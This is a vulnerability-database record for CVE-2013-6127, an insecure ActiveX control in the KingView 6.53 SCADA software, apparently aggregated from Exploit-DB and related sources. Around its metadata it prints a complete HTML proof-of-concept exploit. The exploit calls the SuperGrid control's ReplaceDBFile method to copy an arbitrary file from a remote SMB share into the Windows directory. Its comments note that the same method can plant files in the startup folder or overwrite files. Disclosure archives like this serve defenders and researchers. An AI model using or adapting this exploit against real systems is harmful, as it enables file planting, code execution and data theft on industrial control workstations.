ID

VAR-E-201309-0194


CVE

cve_id:CVE-2013-6127

Trust: 1.9

cve_id:CVE-2013-6128

Trust: 0.3

sources: BID: 62419 // EXPLOIT-DB: 28084 // EDBNET: 49926

EDB ID

28084


TITLE

KingView 6.53 - 'SuperGrid' Insecure ActiveX Control - Windows local Exploit

Trust: 0.6

sources: EXPLOIT-DB: 28084

DESCRIPTION

KingView 6.53 - 'SuperGrid' Insecure ActiveX Control. CVE-97015CVE-2013-6127 . local exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 28084

AFFECTED PRODUCTS

vendor:kingviewmodel: - scope:eqversion:6.53

Trust: 1.6

vendor:wellintechmodel:kingviewscope:eqversion:6.53

Trust: 0.3

sources: BID: 62419 // EXPLOIT-DB: 28084 // EDBNET: 49926

EXPLOIT

<html>
<object classid='clsid:F494550F-A028-4817-A7B5-E5F2DCB4A47E' id='target'></object>
<!--
KingView Insecure ActiveX Control - SuperGrid
Vendor: http://www.wellintech.com
Version: KingView 6.53
Tested on: Windows XP SP3 / IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: Blake

CLSID: F494550F-A028-4817-A7B5-E5F2DCB4A47E
ProgId: SUPERGRIDLib.SuperGrid
Path: C:\Program Files\KingView\SuperGrid.ocx
MemberName: ReplaceDBFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implemented
-->
<title>KingView Insecure ActiveX Control Proof of Concept - SuperGrid.ocx</title>
<p>This proof of concept will copy any arbritrary file from one location to a second location. A malicious user may be able to use this to copy a file from an attacker controlled share to the target or from the target to an attacker controlled system (ie from an attacker share to the startup folder). It can also be used to overwrite existing files.</p>

<input type=button onclick="copyfile()" value="Do It!">
<script>
function copyfile()
{
var file1 = "\\\\192.168.1.165\\share\\poc.txt"; //source
var file2 = "c:\\WINDOWS\\poc.txt"; //destination
result = target.ReplaceDBFile(file1,file2);
}

</script>

Trust: 1.0

sources: EXPLOIT-DB: 28084

EXPLOIT LANGUAGE

html

Trust: 0.6

sources: EXPLOIT-DB: 28084

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 28084

TYPE

'SuperGrid' Insecure ActiveX Control

Trust: 1.0

sources: EXPLOIT-DB: 28084

CREDITS

blake

Trust: 0.6

sources: EXPLOIT-DB: 28084

EXTERNAL IDS

db:NVDid:CVE-2013-6127

Trust: 1.9

db:EXPLOIT-DBid:28084

Trust: 1.6

db:EDBNETid:49926

Trust: 0.6

db:NVDid:CVE-2013-6128

Trust: 0.3

db:BIDid:62419

Trust: 0.3

sources: BID: 62419 // EXPLOIT-DB: 28084 // EDBNET: 49926

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2013-6127

Trust: 1.6

url:https://www.exploit-db.com/exploits/28084/

Trust: 0.6

sources: EXPLOIT-DB: 28084 // EDBNET: 49926

SOURCES

db:BIDid:62419
db:EXPLOIT-DBid:28084
db:EDBNETid:49926

LAST UPDATE DATE

2022-07-27T09:21:57.421000+00:00


SOURCES UPDATE DATE

db:BIDid:62419date:2013-10-23T00:37:00

SOURCES RELEASE DATE

db:BIDid:62419date:2013-09-04T00:00:00
db:EXPLOIT-DBid:28084date:2013-09-04T00:00:00
db:EDBNETid:49926date:2013-09-04T00:00:00